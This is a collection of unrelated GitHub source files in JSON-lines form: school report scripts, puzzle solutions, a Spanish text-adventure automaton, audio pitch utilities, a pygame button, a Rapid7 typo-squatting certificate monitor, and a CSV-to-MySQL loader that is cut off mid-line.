{"seq_id":"43601515141","text":"\"\"\"\nScript written to get school wise count of 11th & 12th students studying\nBiology, Pure Science, Computer Science, Computer Application, Computer Technology\nin Chengalpattu and Chennai districts\n\nHoping this script will be useful in future by editing some of the parameters\n\"\"\"\n\nimport utilities.utilities as utilities\n\n\n# File path to the report\nfile_path = r'/home/rabboni/Downloads/Grpwise-Mediumwise-Report.xlsx'\ngeog_classification_file_path = r'/home/rabboni/Documents/EMIS/Data Reporting/reports/schools_urban_rural_classfication.xlsx'\n\n\ndef dist_class_group_filtered_students_count():\n    \"\"\"\n    Function to filter the groupwise data of all school students\n    district wise, class wise, group wise.\n    \"\"\"\n\n    # Districts to filter\n    districts = ['CHENGALPATTU', 'CHENNAI']\n    # School types to filter\n    school_types = ['Government']\n    # Groups to filter\n    groups = [2503, 2608, 2502, 2702, 2802]\n    # Columns to save\n    columns = ['DistrictName', 'BlockName', 'EduDistrictName', 'UDISE',\t'SchoolName', 'SchoolType', 'GroupCode', 'GroupName', 'Medium', 'Cls_11_Total', 'Cls_12_Total']\n\n    # Load the report as a pandas data frame object\n    df_grp_wise_rpt = utilities.read_sheet(file_path, 'Report')\n\n    # Filter districts\n    df_grp_wise_rpt_filtered_dist = utilities.filter_dataframe_column(df_grp_wise_rpt, 'DistrictName', districts)\n\n    # Filter by group codes\n    df_grp_wise_rpt_filtered_dist_grp = utilities.filter_dataframe_column(df_grp_wise_rpt_filtered_dist,'GroupCode', groups)\n\n    # Filter by school type\n    df_grp_wise_rpt_filtered_dist_grp_schl = utilities.filter_dataframe_column(df_grp_wise_rpt_filtered_dist_grp,'SchoolType', school_types)\n\n    \n    df_grp_wise_rpt_for_save = utilities.columns_subset(df_grp_wise_rpt_filtered_dist_grp_schl, columns)\n\n    # Rename columns for better readability\n    
df_grp_wise_rpt_for_save.rename(columns = {'Cls_11_Total':'Class 11 students','Cls_12_Total':'Class 12 students'}, inplace = True)\n\n # Save the modified data frame to excel\n utilities.save_to_excel(df_grp_wise_rpt_for_save, 'school_grp_student_count.xlsx', 'Report')\n\n\ndef low_student_count(student_count_threshold, location_classification, class_column_name, desired_col_name, file_name):\n \"\"\"\n Function to get data of schools where students in a group are less than a given threshold number\n The data is filtered to given location classification: Urban/Rural\n \"\"\"\n\n # School types to filter\n school_types = ['Government']\n # Columns to save\n columns = ['DistrictName', 'BlockName', 'EduDistrictName', 'UDISE',\t'SchoolName', 'SchoolType', 'GroupCode', 'GroupName', 'Medium', 'Cls_12_Total']\n \n\n # Load the data containing Rural/Urban classification of schools as a data frame object\n df_geo_classif = utilities.read_sheet(geog_classification_file_path, 'location_classification')\n\n # Filter schools with given location classification\n df_geo_filtered = utilities.filter_dataframe_column(df_geo_classif, 'Location', [location_classification])\n\n # Load the group wise report as a pandas data frame object\n df_grp_wise_rpt = utilities.read_sheet(file_path, 'Report')\n\n # Filter by school type\n df_grp_wise_rpt_schl = utilities.filter_dataframe_column(df_grp_wise_rpt,'SchoolType', school_types)\n\n\n # Get the intersection of school data with goup wise report and schools with location_classification\n df_geo_classif_merged = df_grp_wise_rpt_schl.merge(df_geo_filtered[['UDISE', 'Location']])\n\n # Get the schools whose students in a group/class is less than the given threshold\n df_lower_than_threshold = utilities.filter_column_le(df_geo_classif_merged, class_column_name, student_count_threshold)\n\n # Select a subset of columns to save for final report\n df_lower_than_threshold_for_save = utilities.columns_subset(df_lower_than_threshold, columns)\n\n # Rename column for better readability\n df_lower_than_threshold_for_save.rename(columns = {class_column_name:desired_col_name}, inplace = True)\n\n # Save the modified data frame to excel\n utilities.save_to_excel(df_lower_than_threshold_for_save, file_name, 'Report')\n\n\n\n\n\n\n# Main function to call the specific function\ndef main():\n \n # Function that count of students in schools filtered district, class & group wise\n #dist_class_group_filtered_students_count()\n\n low_student_count(30, 'Urban', 'Cls_12_Total', 'Class 12 Students', 'urban_schools_le_30_student_strength.xlsx')\n low_student_count(15, 'Rural', 'Cls_12_Total', 'Class 12 Students', 'rural_schools_le_15_student_strength.xlsx')\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"RabboniRabi/reports_automation","sub_path":"reports_automation/ad_hoc/groupwise_student_total.py","file_name":"groupwise_student_total.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"42806162915","text":"class Solution:\n def getLucky(self, s: str, k: int) -> int:\n base=ord(\"a\")-1\n lst=[str(ord(item)-base) for item in s]\n cur=\"\".join(lst)\n for i in range(k):\n acc=0\n for item in str(cur):\n acc+=int(item)\n cur=acc\n return 
cur\n","repo_name":"lkwq007/leetcode-py","sub_path":"1945-Sum-of-Digits-of-String-After-Conve.py","file_name":"1945-Sum-of-Digits-of-String-After-Conve.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"73"} +{"seq_id":"13942107759","text":"ar=[]\nn=int(input())\ns=input().split(\" \")\nfor i in s:\n\tar.append(int(i))\nmax=[]\nfor i in range(len(ar)):\n\tcount=0\n\tfor j in range(i+1,len(ar)):\n\t\tcount+=1\n\t\tif(ar[i]==ar[j]):\n\t\t\tmax.append(count)\nif(len(max)==0):\n\tprint(\"-1\")\nelse:\t\t\t\n\tprint(min(max))","repo_name":"rishi772001/Competetive-programming","sub_path":"Hackerrank/minimum dist.py","file_name":"minimum dist.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"73"} +{"seq_id":"12762572510","text":"from pyformlang.finite_automaton import (\n DeterministicFiniteAutomaton as DFA,\n State as st,\n Symbol as sb,\n)\nfrom model.Transducer import Transducer as FST\nimport re\n\n\nclass Automaton(object):\n def __init__(self):\n self.names = self.initialize_names()\n self.states = self.set_up_states()\n self.final_states = self.set_up_final_states()\n self.automaton = self.set_up_automaton()\n self.regular_expressions = {}\n self.set_regular_expressions()\n\n def __str__(self) -> str:\n pass\n\n def contains_state(self, state):\n return state in self.states\n\n def set_names(self, names):\n for n in names:\n self.names.append(n)\n\n def set_states(self, states):\n for s in states:\n self.states.append(s)\n\n def accepts(self, input):\n return self.automaton.accepts(input)\n\n def to_regex(self):\n return self.automaton.to_regex()\n\n def to_dict(self):\n return self.automaton.to_dict()\n\n def is_final_state(self, state):\n return self.automaton.is_final_state(state)\n\n def is_start_state(self, state):\n return self.automaton.start_state == state\n\n def get_state(self, state_name):\n for pk in self.states:\n if pk.value == state_name:\n return pk\n\n def get_final_state(self, state_name):\n for pk in self.final_states:\n if pk.value == state_name:\n return pk\n\n def get_index_of_state(self, state_name):\n state = self.get_state(state_name)\n return self.states.index(state)\n\n def get_index_of_final_state(self, state_name):\n state = self.get_final_state(state_name)\n return self.final_states.index(state)\n\n def set_regular_expressions(self):\n nod_dict = self.to_dict()\n states = []\n for pk, val in nod_dict.items():\n for k in val.keys():\n states.append(k)\n\n regex_patterns = []\n for i in [\n re.compile(r\".*(explorar|costa).*\", re.IGNORECASE),\n re.compile(r\".*(refugiar|bosque|buscar).*\", re.IGNORECASE),\n re.compile(r\".*(investigar|cueva).*\", re.IGNORECASE),\n re.compile(r\".*(avanzar|playa).*\", re.IGNORECASE),\n re.compile(r\".*(construir|choza).*\", re.IGNORECASE),\n re.compile(r\".*(noche|pasar|vela).*\", re.IGNORECASE),\n re.compile(r\".*(encontrar|mapa|antiguo).*\", re.IGNORECASE),\n re.compile(r\".*(despertar|criatura|durmiente).*\", re.IGNORECASE),\n re.compile(r\".*(descubrir|cofre|enterrado).*\", re.IGNORECASE),\n re.compile(r\".*(seguir|tribu|nativos).*\", re.IGNORECASE),\n re.compile(r\".*(encontrar|pistas|tesoro).*\", re.IGNORECASE),\n re.compile(r\".*(accionar|extraña|palanca|palmera).*\", re.IGNORECASE),\n re.compile(r\".*(investigar|ruido|extraño|matorrales).*\", re.IGNORECASE),\n re.compile(r\".*(tratar|sobrevivir|noche).*\", re.IGNORECASE),\n 
re.compile(r\".*(cavar|x|arena).*\", re.IGNORECASE),\n re.compile(r\".*(inspeccionar|antes).*\", re.IGNORECASE),\n re.compile(r\".*(huir|cueva).*\", re.IGNORECASE),\n re.compile(r\".*(intentar|comunicar|criatura).*\", re.IGNORECASE),\n re.compile(r\".*(quedar|solo).*\", re.IGNORECASE),\n re.compile(r\".*(cofre|llevar|ambos).*\", re.IGNORECASE),\n re.compile(r\".*(intentar|negociar|jefa).*\", re.IGNORECASE),\n re.compile(r\".*(escapar|nativos).*\", re.IGNORECASE),\n re.compile(r\".*noche.*\", re.IGNORECASE),\n re.compile(r\".*(día|dia).*\", re.IGNORECASE),\n re.compile(\n r\".*(continuar|busqueda|búsqueda|buscar|tesoro).*\", re.IGNORECASE\n ),\n re.compile(r\".*(isla|permanecer|ermitaño).*\", re.IGNORECASE),\n re.compile(r\".*(buscar|comida).*\", re.IGNORECASE),\n re.compile(r\".*(entrar|otro).*\", re.IGNORECASE),\n re.compile(r\".*(acuerdo|beneficio).*\", re.IGNORECASE),\n re.compile(r\".*(robar|tratar|nativos).*\", re.IGNORECASE),\n re.compile(r\".*(esconder|embarcación|embarcacion).*\", re.IGNORECASE),\n re.compile(r\".*(correr|costa|desesperado|escapar).*\", re.IGNORECASE),\n ]:\n regex_patterns.append(i)\n\n tuplas = list(zip(states, regex_patterns))\n self.regular_expressions = dict(tuplas)\n\n def initialize_names(self):\n names = {\n \"Isla\": \"de los Secretos\",\n \"Playa\": \"de los Misterios\",\n \"Bosque\": \"de las Sombras\",\n \"Cueva\": \"de los Antiguos\",\n \"Choza\": \"Secreta\",\n \"Criatura\": \"Xelthor\",\n \"Lider\": \"Leilani\",\n \"Protagonista\": \"Silvanus\",\n }\n return names\n\n def set_up_states(self):\n states = []\n\n for s in [\n st(f\"Náufrago en la Isla {self.names['Isla']}\"), # q0\n st(f\"Playa {self.names['Playa']}\"), # q1\n st(f\"Bosque {self.names['Bosque']}\"), # q2\n st(f\"Cueva {self.names['Cueva']}\"), # q3\n st(f\"Orilla Despejada\"), # q4\n st(f\"Choza {self.names['Choza']}\"), # q5\n st(f\"Noche Tenebrosa\"), # q6\n st(f\"Tesoro Enterrado\"), # q7\n st(f\"Conversación con {self.names['Criatura']}\"), # q8\n st(f\"Cofre del pasado\"), # q9\n st(f\"Encuentro con los Nativos\"), # q10\n st(f\"Ruinas Misteriosas\"), # q11\n st(f\"Día Nuevo\"), # q12\n st(f\"Afuera de la cueva {self.names['Cueva']}\"), # q13\n st(f\"Acuerdo con los Nativos\"), # q14\n st(f\"Fuga Desesperada\"), # q15\n ]:\n states.append(s)\n return states\n\n def set_up_final_states(self):\n final_states = []\n\n for fn in [\n st(\n f\"Salvaje final: {self.names['Protagonista']} es atacado por animales salvaje\"\n ),\n st(\n f\"Devorado por la bestia: Era una bestia feroz, {self.names['Protagonista']} es devorado por ella\"\n ),\n st(\n f\"Regreso Triunfante: {self.names['Protagonista']} descubre el tesoro, es rescatado y regresa como héroe\"\n ),\n st(\n f\"Trampa mortal: {self.names['Protagonista']} Acciona accidentalmente una trampa mortal\"\n ),\n st(\n f\"Alianza inusual: {self.names['Protagonista']} Establece una comunicación inusual con {self.names['Criatura']} y logra salir de la isla en compañía de {self.names['Criatura']}\"\n ),\n st(\n f\"Ataque inesperado: {self.names['Protagonista']} es emboscado, atacado y asesinado por los nativos hostiles\"\n ),\n ]:\n final_states.append(fn)\n\n return final_states\n\n def modify_name(self, subject, new_name):\n current_name = self.names[subject]\n fst = FST(current_name)\n fst.change_transducer(new_name)\n translated_name = fst.translate(current_name)\n if translated_name is not None:\n self.names[subject] = translated_name\n self.states = self.set_up_states()\n self.final_states = self.set_up_final_states()\n self.automaton = 
self.set_up_automaton()\n self.set_regular_expressions()\n\n def set_up_automaton(self):\n temp = DFA()\n q = self.states\n qf = self.final_states\n\n q0_q1 = sb(f\"Explorar la costa\".replace(\" \", \"_\"))\n q0_q2 = sb(\n f\"Buscar refugio en el bosque {self.names['Bosque']}\".replace(\" \", \"_\")\n )\n\n q1_q3 = sb(f\"Investigar una cueva misteriosa\".replace(\" \", \"_\"))\n q1_q4 = sb(f\"Avanzar por la playa {self.names['Playa']}\".replace(\" \", \"_\"))\n\n q2_q5 = sb(f\"Construir una choza\".replace(\" \", \"_\"))\n q2_q6 = sb(f\"Pasar la noche en vela\".replace(\" \", \"_\"))\n\n q3_q7 = sb(f\"Encontrar un mapa antiguo\".replace(\" \", \"_\"))\n q3_q8 = sb(\n f\"Despertar a una criatura durmiente llamada {self.names['Criatura']}\".replace(\n \" \", \"_\"\n )\n )\n\n q4_q9 = sb(f\"Descubrir un cofre enterrado\".replace(\" \", \"_\"))\n q4_q10 = sb(\n f\"Seguir a una tribu de nativos liderada por la jefa {self.names['Lider']}\".replace(\n \" \", \"_\"\n )\n )\n\n q5_q11 = sb(f\"Encontrar pistas sobre el tesoro\".replace(\" \", \"_\"))\n q5_qfin1 = sb(f\"Accionar una extraña palanca en una palmera\".replace(\" \", \"_\"))\n\n q6_qfin2 = sb(\n f\"Investigar un ruido extraño proveniente de los matorrales\".replace(\n \" \", \"_\"\n )\n )\n q6_q12 = sb(\n f\"Tratar de sobrevivir a la noche desde un único punto\".replace(\" \", \"_\")\n )\n\n q7_qfin3 = sb(f\"Cavar en la X que hay en la arena\".replace(\" \", \"_\"))\n q7_qfin4 = sb(f\"Inspeccionar el lugar antes de cavar en la X\".replace(\" \", \"_\"))\n\n q8_q13 = sb(f\"Huir de la cueva {self.names['Cueva']}\".replace(\" \", \"_\"))\n q8_qfin5 = sb(\n f\"Intentar comunicarte con {self.names['Criatura']}\".replace(\" \", \"_\")\n )\n\n q9_qfin3 = sb(f\"Quedarse solo con el tesoro\".replace(\" \", \"_\"))\n q9_qfin4 = sb(f\"Llevarse el tesoro y el cofre\".replace(\" \", \"_\"))\n\n q10_q14 = sb(\n f\"Intentar negociar con la jefa {self.names['Lider']}\".replace(\" \", \"_\")\n )\n q10_q15 = sb(f\"Escapar sigilosamente de los nativos\".replace(\" \", \"_\"))\n\n q11_qfin1 = sb(f\"Explorar las ruinas de noche\".replace(\" \", \"_\"))\n q11_qfin6 = sb(f\"Explorar las ruinas de día\".replace(\" \", \"_\"))\n\n q12_qfin3 = sb(f\"Continuar la búsqueda del misterioso tesoro\".replace(\" \", \"_\"))\n q12_qfin1 = sb(\n f\"Permanecer en la isla {self.names['Isla']} como ermitaño llamado {self.names['Protagonista']}\".replace(\n \" \", \"_\"\n )\n )\n\n q13_qfin3 = sb(\n f\"Buscar comida alrededor de la cueva {self.names['Cueva']}\".replace(\n \" \", \"_\"\n )\n )\n q13_qfin4 = sb(\n f\"Tratar de entrar por el otro lado de la cueva {self.names['Cueva']}\".replace(\n \" \", \"_\"\n )\n )\n\n q14_qfin3 = sb(\n f\"Llegar a un acuerdo beneficioso con la jefa {self.names['Lider']}\".replace(\n \" \", \"_\"\n )\n )\n q14_qfin6 = sb(f\"Tratar de robar a los nativos\".replace(\" \", \"_\"))\n\n q15_qfin3 = sb(f\"Esconderse en una embarcación\".replace(\" \", \"_\"))\n q15_qfin6 = sb(\n f\"Correr hasta la costa en un intento desesperado por escapar\".replace(\n \" \", \"_\"\n )\n )\n\n temp.add_transitions(\n [\n (q[0], q0_q1, q[1]),\n (q[0], q0_q2, q[2]),\n (q[1], q1_q3, q[3]),\n (q[1], q1_q4, q[4]),\n (q[2], q2_q5, q[5]),\n (q[2], q2_q6, q[6]),\n (q[3], q3_q7, q[7]),\n (q[3], q3_q8, q[8]),\n (q[4], q4_q9, q[9]),\n (q[4], q4_q10, q[10]),\n (q[5], q5_q11, q[11]),\n (q[5], q5_qfin1, qf[0]),\n (q[6], q6_qfin2, qf[1]),\n (q[6], q6_q12, q[12]),\n (q[7], q7_qfin3, qf[2]),\n (q[7], q7_qfin4, qf[3]),\n (q[8], q8_q13, q[13]),\n (q[8], q8_qfin5, qf[4]),\n (q[9], 
q9_qfin3, qf[2]),\n (q[9], q9_qfin4, qf[3]),\n (q[10], q10_q14, q[14]),\n (q[10], q10_q15, q[15]),\n (q[11], q11_qfin1, qf[0]),\n (q[11], q11_qfin6, qf[5]),\n (q[12], q12_qfin3, qf[2]),\n (q[12], q12_qfin1, qf[0]),\n (q[13], q13_qfin3, qf[2]),\n (q[13], q13_qfin4, qf[3]),\n (q[14], q14_qfin3, qf[2]),\n (q[14], q14_qfin6, qf[5]),\n (q[15], q15_qfin3, qf[2]),\n (q[15], q15_qfin6, qf[5]),\n ]\n )\n\n temp.add_start_state(q[0])\n for st in qf:\n temp.add_final_state(st)\n\n return temp\n","repo_name":"SebasEscobarM/StoryGenerator","sub_path":"src/model/Automaton.py","file_name":"Automaton.py","file_ext":"py","file_size_in_byte":12232,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"3850927997","text":"import insightconnect_plugin_runtime\nfrom .schema import SearchCertstreamInput, SearchCertstreamOutput, Input, Output, Component\n\n# Custom imports below\nfrom insightconnect_plugin_runtime.exceptions import PluginException\nimport certstream\nimport re\nimport Levenshtein\nfrom komand_typo_squatter.util import utils\n\n\nclass SearchCertstream(insightconnect_plugin_runtime.Trigger):\n def __init__(self):\n super(self.__class__, self).__init__(\n name=\"search_certstream\",\n description=Component.DESCRIPTION,\n input=SearchCertstreamInput(),\n output=SearchCertstreamOutput(),\n )\n self.domain = \"\"\n self.query = \"\"\n self.levenshtein = 0\n\n def callback(self, message, context): # pylint: disable=unused-argument\n \"\"\"Callback handler for certstream events.\"\"\"\n message_type = message.get(\"message_type\")\n if message_type == \"heartbeat\":\n return\n\n if message_type == \"certificate_update\":\n all_domains = message.get(\"data\", {}).get(\"leaf_cert\", {}).get(\"all_domains\", [])\n\n for domain in all_domains:\n score = utils.score_domain(domain.lower())\n\n # If issued from a free CA = more suspicious\n issued = message.get(\"data\", {}).get(\"leaf_cert\", {}).get(\"issuer\", {}).get(\"O\")\n if issued:\n if \"Let's Encrypt\" in issued:\n score += 10\n if self.query:\n if not re.search(self.query, domain):\n continue\n else:\n if Levenshtein.distance(str(self.domain), str(domain)) > self.levenshtein:\n continue\n self.send({Output.DOMAIN: domain, Output.SCORE: score})\n else:\n raise PluginException(\n cause=\"An unrecognized message type was returned.\", assistance=\"Please contact support.\"\n )\n\n def run(self, params={}):\n \"\"\"Run the trigger\"\"\"\n self.query = params.get(Input.QUERY)\n self.levenshtein = params.get(Input.LEVENSHTEIN)\n self.domain = params.get(Input.DOMAIN)\n certstream.listen_for_events(self.callback, \"wss://certstream.calidog.io\")\n","repo_name":"rapid7/insightconnect-plugins","sub_path":"plugins/typo_squatter/komand_typo_squatter/triggers/search_certstream/trigger.py","file_name":"trigger.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"73"} +{"seq_id":"39401480948","text":"import numpy as np\nfrom utils.constants import *\nfrom scipy import signal\n\ndef autocorrelation(x_win, sr=SAMPLE_RATE, minF0=MIN_F0, maxF0=MAX_F0):\n \"\"\"F0 detection on a single frame using autocorrelation\n \n Args:\n x_win: numpy.array of the windowed signal frame\n fs: Sampling rate\n minF0: Min F0 limit\n maxF0: Max F0 limit\n \n Returns:\n ValAC: numpy.array of the autocorrelation values.\n f0: numpy.array f values for those ValAC values\n \"\"\"\n f0 = np.array([])\n minT0 = int(np.round(sr/maxF0))\n maxT0 = 
int(np.round(sr/minF0))\n\n Ts = range(minT0, maxT0)\n ValAC = np.array([])\n\n for k in Ts:\n x_win_shifted = np.hstack((np.zeros(k), x_win[:-k]))\n autoCorr = np.dot(x_win, x_win_shifted)\n ValAC = np.append(ValAC, autoCorr)\n\n f0 = np.divide(sr*np.ones(len(Ts)), Ts)\n return ValAC, f0\n\ndef get_peaks(sig:list, xticks:list):\n \"\"\"Returns the x,y values of the peaks in sig\n\n Args:\n sig: numpy.array of the signal of which to fing the peaks\n xticks: numpy.array of the corresponding x axis values for sig\n\n Returns:\n yval: y values of the peaks\n xval: x values of the peaks\n \"\"\"\n\n if len(sig) != len(xticks):\n raise ValueError(\"xticks and sig must have the same length\")\n\n peaks, _ = signal.find_peaks(sig)\n\n tuplelist = [(a, b) for a, b in zip(xticks[peaks], sig[peaks])]\n tuplelist.sort(key=lambda x: x[1], reverse=True)\n\n yval = [a for a, b in tuplelist]\n xval = [b for a, b in tuplelist]\n\n return yval, xval\n\ndef framesReduction(frames_mat):\n \"\"\"Modifies frames_mat to only contain the three first elements in each element\n\n Args:\n frames_mat: list of frames\n\n Returns:\n frames_mat: modified list of frames\n \"\"\"\n\n for i, frame in enumerate(frames_mat):\n\n upper = min(3, len(frame))\n frames_mat[i] = frame[:upper]\n\n return frames_mat\n\ndef smooth_function(sig, window_type= 'triang', window_len = 50, mode = 'same'):\n return np.convolve(sig, signal.get_window(window_type, window_len), mode=mode)\n\ndef apply_threshold(sig,th):\n \"\"\"Apply threshold to a signal \n \n Args:\n sig: numpy.array of the signal to be thresholded\n th: threshold value over one\n \n Returns:\n sig: thresholded signal\n \"\"\"\n sig = sig / np.max(sig)\n sig[sig < th] = 0\n sig[sig >= th] = 1\n return sig\n\ndef freq2MIDI(freq):\n \"\"\"Converts frequency values array to midi values array\n\n Args:\n freq: numpy.array containing the frequencies\n\n Returns:\n midi: numpy.array containing the midi (non quantized) values.\n\n \"\"\"\n freq = np.clip(freq, a_min=8.175, a_max=12543.854)\n midi = np.log2(freq/440.0) * 12 + 69\n return midi\n\ndef apply_masks(array, *args):\n \"\"\"Apply masks to array\n \n Args:\n array: numpy.array of the signal to be masked\n *args: list of the masks to be applied\n \n Returns:\n array: masked array\n \"\"\"\n for arg in args:\n array = np.multiply(array, arg)\n return array\n ","repo_name":"MarcSM/predominant-pitch-extraction-in-polyphonic-signals","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"74343372075","text":"import pygame as pg\n\nfrom .. 
import prepare\nfrom .label import Label\n\n\nclass ToggleButton:\n def __init__(self, text, topleft, callback, font_size=35, *args):\n self.text = text\n self.callback = callback\n self.font_size = font_size\n self.args = args\n self.create_images()\n self.image = self.image_idle\n self.rect = self.image.get_rect(topleft=topleft)\n self.hovered = False\n self.active = False\n\n def calculate_size(self):\n label = Label(self.text, self.font_size)\n width = label.rect.width + 20\n height = label.rect.height + 10\n return width, height\n\n def create_images(self):\n width, height = self.calculate_size()\n rect = pg.rect.Rect(0, 0, width, height)\n label = Label(self.text, self.font_size, center=rect.center)\n self.image_idle = pg.transform.scale(\n prepare.GFX['ui']['button_idle'], (width, height))\n label.draw(self.image_idle)\n self.image_hover = pg.transform.scale(\n prepare.GFX['ui']['button_hover'], (width, height))\n label.draw(self.image_hover)\n self.image_active = pg.transform.scale(\n prepare.GFX['ui']['button_active'], (width, height))\n label.draw(self.image_active)\n\n def hover(self):\n self.hovered = True\n if not self.active:\n self.image = self.image_hover\n\n def unhover(self):\n self.hovered = False\n if not self.active:\n self.image = self.image_idle\n\n def click(self):\n if self.hovered:\n if self.active:\n self.deactivate()\n else:\n self.activate()\n self.callback(*self.args)\n\n def activate(self):\n self.active = True\n self.image = self.image_active\n\n def deactivate(self):\n if self.active:\n self.active = False\n if self.hovered:\n self.image = self.image_hover\n else:\n self.image = self.image_idle\n\n def draw(self, surface):\n surface.blit(self.image, self.rect)\n\n def update(self):\n if self.rect.collidepoint(pg.mouse.get_pos()):\n if not self.hovered:\n self.hover()\n else:\n if self.hovered:\n self.unhover()\n\n\nclass GroupButton(ToggleButton):\n def click(self):\n # we go here only if button is not active\n if self.hovered:\n # if self.active:\n # self.deactivate()\n self.activate()\n self.callback(*self.args)\n","repo_name":"Cactusson/mazes","sub_path":"data/components/toggle_button.py","file_name":"toggle_button.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5737064456","text":"# simple script to run the lumberjack 2d grid world from mesa-gym\n\n# add filenames to this dict if you want to use a trained model for some entities\n# eg. 
trained_models[id] = \"\"\ntrained_models = {}\ntrained_models[\"StrongLumberjack\"] = \"models/StrongLumberjack_lumberjack-qlearning_selfishness_500_0.05_1.0_0.004_0.1.pickle\"\ntrained_models[\"WeakLumberjack\"] = \"models/WeakLumberjack_lumberjack-qlearning_selfishness_500_0.05_1.0_0.004_0.1.pickle\"\n\nimport mesa_gym.gyms.grid.lumberjack.env as e\nenv = e.MesaLumberjackEnv(render_mode=\"human\")\n\nimport os\npath = os.path.dirname(os.path.abspath(__file__))\n\nimport numpy as np\nimport pickle\n\ndef load_trained_models(trained_models):\n q_tables = {}\n for agent_type in trained_models.keys():\n with open(trained_models[agent_type], \"rb\") as f:\n q_tables[agent_type] = pickle.load(f)\n return q_tables\n\n# load q_tables from trained models\nq_tables = load_trained_models(trained_models)\n\n# start environment\nobservations, info = env.reset()\n\nfor _ in range(100):\n actions = {}\n for agent in env.agents:\n id = agent.unique_id\n agent_type = type(agent).__name__\n observation = tuple(observations[id])\n if agent_type in trained_models:\n if observation not in q_tables[agent_type]:\n action = env.action_space[id].sample()\n agent.trace(\"UNKNOWN CONDITION in my Qtable: random extraction\")\n else:\n action = int(np.argmax(q_tables[agent_type][observation]))\n else:\n action = env.action_space[id].sample()\n actions[id] = action\n\n observations, rewards, terminated, truncated, info = env.step(actions=actions)\n\n if terminated or truncated:\n exit(1)\n observations, info = env.reset()\n\nenv.close()","repo_name":"gsileno/mesa-gym","sub_path":"mesa_gym/gyms/grid/lumberjack/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"6820580245","text":"import os\nimport csv\n\n# Set up path to read csv \nbank_csv = os.path.join(\"Resources\",\"budget_data.csv\")\n\n# Opened & Read file into reader\nwith open(bank_csv) as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=\",\")\n\n # Set up variables for future use\n total_months = 0\n total_profit= 0\n avg_change = 0\n gain_max = 0\n loss_max = 0\n\n # Took in Header data\n header = next(csv_reader)\n\n # Created a loop to count the total months (rows) in the data set & calculated the total profit in the set\n for row in csv_reader:\n total_months += 1\n total_profit = total_profit + int(row[1])\n \n # Searched for the max gain by comparing the entry to the current highest\n if int(row[1]) > int(gain_max):\n gain_max = row[1]\n gain_date = row[0]\n # performed the inverse of above for the max loss\n if int(row[1]) < int(loss_max):\n loss_max = row[1]\n loss_date = row[0]\n\n # Printed out the results of the analysis to the user in the terminal\n print(\"Financial Analysis\")\n print(\"----------------------------\")\n print(f\"Total Months: {total_months}\")\n print(f\"Total: ${total_profit}\")\n # Calculated the average change for each month\n avg_change = total_profit / total_months\n print(f\"Average Change: ${avg_change}\")\n print(f\"Greatest Increase in Profits: {gain_date} (${gain_max})\")\n print(f\"Greatest Decrease in Profits: {loss_date} (${loss_max})\")\n\n# Output the same results as above to an analysis text file for the user\nbank_output = os.path.join(\"Analysis\",\"analysis.txt\")\nwith open(bank_output,'w') as f:\n f.write(\"Financial Analysis\\n\")\n f.write(\"----------------------------\\n\")\n f.write(f\"Total Months: {total_months}\\n\")\n f.write(f\"Total: 
${total_profit}\\n")\n    f.write(f"Average Change: ${avg_change}\\n")\n    f.write(f"Greatest Increase in Profits: {gain_date} (${gain_max})\\n")\n    f.write(f"Greatest Decrease in Profits: {loss_date} (${loss_max})\\n")","repo_name":"wreinhold/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
{"seq_id":"719418294","text":"class Block:\n    BlkID = -1 # This is incremented every time we attempt to create a block\n    def __init__(self, parent, txns, broadcastTime):\n        \n        Block.BlkID += 1\n        self.id = Block.BlkID\n        self.parent = parent # ID of parent of this block\n        self.txns = txns # List of Txns (with coinbase as last entry)\n        self.broadcastTime = broadcastTime # Time at which block was mined and broadcasted\n        self.accepted = False # Voting is successful\n        self.votes = 0 # Number of votes received in voting","repo_name":"shashankiit/CS762-DtDPos-Project","sub_path":"block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
{"seq_id":"38277515562","text":"import sys\nsys.path.append(r'\\bin\\common')\nimport db_config as db\nfrom leagueoflegends import leagueoflegends_utils as utils\n\nimport mysql.connector\n\nurl='https://oracleselixir-downloadable-match-data.s3-us-west-2.amazonaws.com/2020_LoL_esports_match_data_from_OraclesElixir_20200810.csv'\nutils.download_rawdata_csv(url)\n\n\n#######################################################reading data from csv##########################################################\n\nimport csv\n\nwith open('input.csv', newline='') as f:\n    reader = csv.reader(f)\n    data = list(reader)\n\n\n\n# print(data[0])\n\n\n\n#######################################################reading data from csv###########################################################\n\nfstr=\"\"\n\nfor col in data[0]:\n\tfstr=fstr+col.replace(\" \",\"_\")+\" varchar(20) \"+\",\\n \"\n\n\n\n# print(fstr[:-2])\n\n\ncreatequery=f\"create table if not EXISTS raw_data ({fstr[:-3]} )\"\n\n\n\nprint(createquery)\n\ndb.mycursor.execute(createquery)\n\ndb.mydb.commit()\n\n\nsql = \"truncate raw_data\"\n\n\ndb.mycursor.execute(sql)\n\n\n\ndb.mydb.commit()\n\n\n\n\n\n\nfor i in range(1,len(data)):\n\n\n\tstr2=\"\"\n\n\tfor val in data[i]:\n\t\tstr2=str2+\"'\"+val+\"'\"+\",\"\n\n\tdatas=f\"INSERT INTO raw_data VALUES ({str2[:-1]})\"\n\t# 